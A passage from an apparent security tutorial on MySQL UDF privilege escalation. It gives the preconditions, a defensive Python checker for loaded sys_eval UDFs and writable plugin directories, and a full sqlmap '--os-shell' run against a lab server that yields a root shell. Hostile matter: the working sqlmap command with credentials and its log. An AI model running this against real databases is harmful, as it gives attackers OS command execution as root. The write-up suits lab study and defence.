+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)

mysql> drop function sys_eval;
Query OK, 0 rows affected (0.00 sec)

mysql> select * from func;
Empty set (0.00 sec)

 

Limitations:

1) The MySQL root account has a weak password.

2) The account MySQL runs as needs write permission on the plugin directory. For example, with MySQL installed via yum:

[root@template tmp]# ls -ald /usr/lib64/mysql/plugin

drwxr-xr-x. 2 root root 4096 4月  25 08:33 /usr/lib64/mysql/plugin

whereas the default MySQL service account is mysql, which has no write permission there.
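A defender-side check for the two preconditions above, added here as an example and not taken from the original post: it parses the `ls -ald` line of plugin_dir and the rows of `select * from func`, flagging any loaded command-execution UDF and a plugin directory that the mysql service account can write to. The function and constant names are mine, and the sample input is constructed.

```python
import re

# UDF names exported by lib_mysqludf_sys that hand out OS command execution
CMD_EXEC_UDFS = {"sys_eval", "sys_exec"}

# Start of an `ls -ald` line: type, perms, optional SELinux/ACL marker,
# link count, owner, group (the rest of the line is ignored)
LS_LINE = re.compile(r"^([dl-])([rwxstST-]{9})[.+@]?\s+\d+\s+(\S+)\s+(\S+)\s+")


def parse_ls_ld(line):
    """Return (perm_string, owner, group) from an `ls -ald` line."""
    m = LS_LINE.match(line)
    if not m:
        raise ValueError("unrecognised ls -ld line: %r" % line)
    return m.group(2), m.group(3), m.group(4)


def writable_by(perms, owner, group, user, user_groups):
    """True if `user` (member of `user_groups`) can create files in the directory.

    Creating a file needs the write bit plus the search bit (x, s or t) of the
    matching permission triplet. root bypasses DAC checks entirely."""
    if user == "root":
        return True
    if user == owner:
        triplet = perms[0:3]
    elif group in user_groups:
        triplet = perms[3:6]
    else:
        triplet = perms[6:9]
    return triplet[1] == "w" and triplet[2] in "xst"


def udf_findings(func_rows, ls_line, service_user="mysql", service_groups=("mysql",)):
    """Combine both checks. `func_rows` are (name, ret, dl, type) tuples as shown
    by `select * from func`; `ls_line` is the `ls -ald` output for plugin_dir."""
    findings = []
    for name, _ret, dl, _type in func_rows:
        if name in CMD_EXEC_UDFS:
            findings.append("UDF %s (from %s) grants OS command execution" % (name, dl))
    perms, owner, group = parse_ls_ld(ls_line)
    if writable_by(perms, owner, group, service_user, service_groups):
        findings.append("plugin_dir is writable by %s: INTO DUMPFILE could drop a .so there" % service_user)
    return findings


if __name__ == "__main__":
    # Constructed sample mirroring the post: one loaded sys_eval, plugin dir root:root 755
    rows = [("sys_eval", 0, "mysqludf.so", "function")]
    ls = "drwxr-xr-x. 2 root root 4096 Apr 25 08:33 /usr/lib64/mysql/plugin"
    for f in udf_findings(rows, ls):
        print("[!]", f)
```

In practice the two inputs come from `mysql -e 'select * from func'` and `ls -ald "$(mysql -Nse "select @@plugin_dir")"`; a non-empty result is a reason to drop the function and review who holds FILE privilege.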

 

UDF privilege escalation can also be run directly with sqlmap's -d option.
The syntax is "DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" or "DBMS://DATABASE_FILEPATH".
[1] dbms: the database in use, here mysql
[2] user: the database user, here root
[3] password: the database password, on my server Hehe123456
[4] dbms_IP: the IP address of the database server, here 192.168.192.120
[5] dbms_PORT: the port the database server listens on
[6] database_NAME: the database you want to use

Verified here directly with sqlmap on Kali:

root@kali:~# sqlmap -d "mysql://root:Hehe123456@192.168.192.120:3306/test" --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:51

[16:56:51] [INFO] connection to mysql server 192.168.192.120:3306 established
[16:56:51] [INFO] testing MySQL
[16:56:51] [INFO] confirming MySQL
[16:56:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:56:51] [INFO] fingerprinting the back-end DBMS operating system
[16:56:51] [INFO] the back-end DBMS operating system is Linux
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:51] [INFO] testing if current user is DBA
[16:56:51] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[16:56:57] [INFO] checking if UDF 'sys_eval' already exist
[16:56:57] [INFO] checking if UDF 'sys_exec' already exist
[16:56:57] [INFO] detecting back-end DBMS version from its banner
[16:56:57] [INFO] retrieving MySQL plugin directory absolute path
[16:56:57] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:58] [INFO] the local file '/tmp/sqlmap6szFlF1831/lib_mysqludf_syswZxteE.so' and the remote file '/usr/lib64/mysql/plugin/libsmuur.so' have the same size (8040 B)
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_eval does not exist')
[16:56:58] [INFO] creating UDF 'sys_exec' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_exec does not exist')
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapoutput'")
[16:56:58] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[16:56:58] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:    'root'